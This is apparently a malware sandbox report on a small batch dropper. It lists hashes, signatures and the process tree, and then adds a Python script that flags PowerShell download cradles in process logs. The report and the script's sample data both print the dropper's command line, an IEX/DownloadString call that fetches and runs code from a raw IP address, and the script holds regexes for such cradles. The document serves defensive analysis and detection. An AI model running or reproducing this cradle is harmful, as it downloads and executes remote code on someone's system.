Analysis
Max time kernel: 114s
Max time network: 117s
Platform: windows10_x64
Resource: win10v200217
Submitted: 05-03-2020 20:10
Static task: static1

Behavioral task: behavioral1
  Sample: 2fUqd8gw.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 2fUqd8gw.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 2fUqd8gw.bat
Size: 197B
MD5: bba13ab064fd650d7da536895d139ddf
SHA1: 9a69c367fd1c5d3447045ab97f18bd1a7090207d
SHA256: 3f7d93a5de4e099d800fe9f59e6a3b4bae526e405962e2f0208e18bc1b5cff91
SHA512: c9b129829953df9ed8e0a9834fc8bafc0259abe65dc7b185535a8550088d459cd25327b17035405c8b424a263df337cc1bd7ea03b13b4bf95b8a948051efc031
Score: 10/10
Malware Config
Extracted
Language: ps1

Source        URLs
ps1.dropper   http://185.103.242.78/pastes/2fUqd8gw
Signatures

Program crash (1 IoC)
Processes:
pid    pid_target   process        target process
3516   3924         WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description                  pid    process
Token: SeRestorePrivilege    3516   WerFault.exe
Token: SeBackupPrivilege     3516   WerFault.exe
Token: SeDebugPrivilege      3516   WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
pid    process
3516   WerFault.exe (14 occurrences)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2fUqd8gw.bat"
   PID: 3896

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2fUqd8gw');Invoke-XUBOTSIATLEGFH;Start-Sleep -s 10000"
      PID: 3924

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 704
         PID: 3516
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
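The three behavioral signatures in this report all fire on WerFault.exe, which is Windows Error Reporting handling the crash of PID 3924 (the value passed to -p), so they describe the crash handler rather than the downloaded payload. What the report does give an analyst is the process chain cmd.exe -> 32-bit powershell.exe, the IEX/DownloadString cradle on the command line, and the URL it fetches. The following is an added example, not part of the sandbox report or its tooling: it triages constructed process-creation records that mirror the tree above (the pid/ppid/image/cmdline field names are an assumed schema, not a real log format), flags the download cradle, extracts the URL as an IoC, reports whether the cradle ran as 32-bit PowerShell on a 64-bit host, and notes when a WerFault.exe child indicates the flagged process crashed.

```python
"""Triage of process-creation records for a PowerShell download cradle.

Added example, not code from the sandbox report. The records below are
constructed to mirror the report's process tree; the field names
(pid, ppid, image, cmdline) are an assumed schema, not a real log format.
"""
import re
from typing import Dict, List, Set

# Constructed records mirroring the report's tree, plus one benign control.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 3896, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2fUqd8gw.bat"'},
    {"pid": 3924, "ppid": 3896,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                 "\"IEX (New-Object System.Net.WebClient).DownloadString("
                 "'http://185.103.242.78/pastes/2fUqd8gw');"
                 "Invoke-XUBOTSIATLEGFH;Start-Sleep -s 10000\"")},
    {"pid": 3516, "ppid": 3924, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 704"},
    # Benign control (constructed): an ordinary script run that must not match.
    {"pid": 4100, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

# A download cradle is Invoke-Expression (or its IEX alias) together with a
# WebClient DownloadString call on the same command line. Case-insensitive
# because PowerShell cmdlet, alias and method names are.
_EXEC_RE = re.compile(r"\b(IEX|Invoke-Expression)\b", re.IGNORECASE)
_DOWNLOAD_RE = re.compile(r"\.DownloadString\s*\(", re.IGNORECASE)
_URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.IGNORECASE)
# WerFault.exe names the faulting process with -p <pid>.
_WERFAULT_RE = re.compile(r"WerFault\.exe.*?\s-p\s+(\d+)", re.IGNORECASE)


def is_download_cradle(cmdline: str) -> bool:
    return bool(_EXEC_RE.search(cmdline) and _DOWNLOAD_RE.search(cmdline))


def extract_urls(cmdline: str) -> List[str]:
    return _URL_RE.findall(cmdline)


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Image basenames from the oldest recorded ancestor down to `pid`."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def crashed_pids(events: List[Dict]) -> Set[int]:
    """PIDs that a WerFault.exe command line reports as the faulting process."""
    out = set()
    for e in events:
        m = _WERFAULT_RE.search(e["cmdline"])
        if m:
            out.add(int(m.group(1)))
    return out


def triage(events: List[Dict]) -> List[Dict]:
    crashed = crashed_pids(events)
    findings = []
    for e in events:
        if not is_download_cradle(e["cmdline"]):
            continue
        findings.append({
            "pid": e["pid"],
            "chain": ancestry(events, e["pid"]),
            "urls": extract_urls(e["cmdline"]),
            # A SysWOW64 image path means 32-bit PowerShell on a 64-bit host.
            "wow64": "\\syswow64\\" in e["image"].lower(),
            # A WerFault child naming this PID means the cradle crashed, so
            # later signatures belong to the crash handler, not the payload.
            "crashed": e["pid"] in crashed,
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

Run on the constructed records, this reports one finding for PID 3924: chain cmd.exe -> powershell.exe, the pastes URL as the IoC, wow64 True, and crashed True, while the benign -File invocation is not flagged. In a real deployment the records would come from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled); the regexes cover only the plain, unobfuscated form seen in this report and would need extending for encoded (-EncodedCommand) or string-concatenated variants.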